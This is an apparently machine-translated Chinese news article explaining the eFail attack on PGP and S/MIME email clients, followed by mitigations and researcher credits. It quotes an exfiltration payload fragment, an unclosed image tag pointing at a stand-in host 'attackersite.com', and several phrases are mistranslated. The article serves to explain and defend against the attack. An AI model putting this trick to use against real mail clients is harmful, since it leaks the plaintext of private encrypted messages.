返回

以下是eFail攻击如何对付PGP和s/MIME加密电子邮件

发布时间:2022-10-04 16:00:41 345
# 服务器# 漏洞# 研究# 服务器# 攻击
efail-attack

PGP和S/MIME是流行的端到端加密标准,用于加密电子邮件,即使是公司、政府或网络犯罪分子,也无法监视您的通信。

在解释漏洞的工作原理之前,应该注意,该漏洞并不存在于电子邮件加密标准本身;相反,它会影响一些错误实施这些技术的电子邮件客户端/插件。
 
配音埃菲尔研究人员称,正如我们之前的预警文章所述,这些漏洞可能会让潜在的攻击者以明文形式解密端到端加密电子邮件的内容,即使是过去发送的邮件。

根据一组欧洲安全研究人员发布的论文,这些漏洞存在于加密电子邮件客户端处理HTML电子邮件和外部资源的方式中,比如从外部URL加载图像和样式。

以下是eFail攻击的工作原理:

pgp-encrypted-email
电子邮件客户端通常被配置为自动解密您收到的加密电子邮件的内容,但如果您的客户端也被配置为自动加载外部资源,攻击者可以滥用此行为,通过向您发送相同加密电子邮件内容的修改版本来窃取明文邮件。

攻击向量需要将明文注入加密邮件中,然后使用该漏洞,一旦任何接收方的邮件客户端访问(或解密)消息,它将退出原始加密数据。

需要注意的是,要执行eFail攻击,攻击者必须能够访问您的加密电子邮件,然后以以下方式修改并发送回您,以便诱使您的电子邮件客户端在不通知您的情况下向远程攻击者泄露机密消息。

正如研究人员发布的概念验证攻击中所述,攻击者使用你应该收到或可能已经收到的加密消息之一,然后将其转换为多部分HTML电子邮件,并伪造返回地址,因此它似乎来自原始发件人。

在新编写的电子邮件中,攻击者添加了一个未关闭的图像标签,如下所示<img src=”https://attackersite.com/就在加密内容之前,通过添加图像标签的结尾来结束它,如下所示:jpg“&gt,如屏幕截图所示。

当您的脆弱电子邮件客户端接收到该消息时,它解密在中间给出的消息的加密部分,然后自动尝试呈现HTML内容,即,将所有解密文本的图像标签作为图像的新名称,如下所示。
pgp-smime-email-encryption

由于您的电子邮件客户端将尝试从攻击者控制的服务器加载图像,攻击者可以捕获此传入请求,其中文件名包含原始加密电子邮件的纯文本完整内容。

虽然PGP的设计目的是在电子邮件的完整性受到损害时向您显示警告,但少数电子邮件客户端不会显示这些警告,从而允许任何潜在攻击者成功执行eFail攻击。

如何防止eFail攻击

email-hacking
一般来说,顾问甚至要拦截你的加密电子邮件都是一件非常困难的工作,但对于那些拼命使用电子邮件加密的人来说,总是会吸引资源丰富、经验丰富的攻击者。

放弃使用PGP或S/MIME来防止eFail攻击将是愚蠢的建议,因为它很容易缓解报告的问题。

用户可以切换到一个好的电子邮件客户端,当电子邮件的完整性受到损害时,该客户端总是显示警告,默认情况下不会呈现HTML电子邮件,以防止自动加载外部资源。

研究人员还建议用户对敏感通信采用经过身份验证的加密算法。

这项研究是由一组研究人员进行的,包括来自明斯特应用科学大学的Damian Poddebniak、Christian Dresen、Fabian Ising和Sebastian Schinzel、波鸿鲁尔大学的Jens Müller、Juraj Somorovsky和Jörg Schwenk还有库鲁汶的西蒙·弗里德伯格。

有关攻击技术的更多详细信息,请访问有关eFail攻击的信息页面,以及研究人员发表的题为“eFail:使用Exfilter Channel破坏S/MIME和OpenPGP电子邮件加密”的论文[PDF]。

 

特别声明:以上内容(图片及文字)均为互联网收集或者用户上传发布,本站仅提供信息存储服务!如有侵权或有涉及法律问题请联系我们。
举报
评论区(0)
按点赞数排序
用户头像
精选文章
thumb 中国研究员首次曝光美国国安局顶级后门—“方程式组织”
thumb 俄乌线上战争,网络攻击弥漫着数字硝烟
thumb 从网络安全角度了解俄罗斯入侵乌克兰的相关事件时间线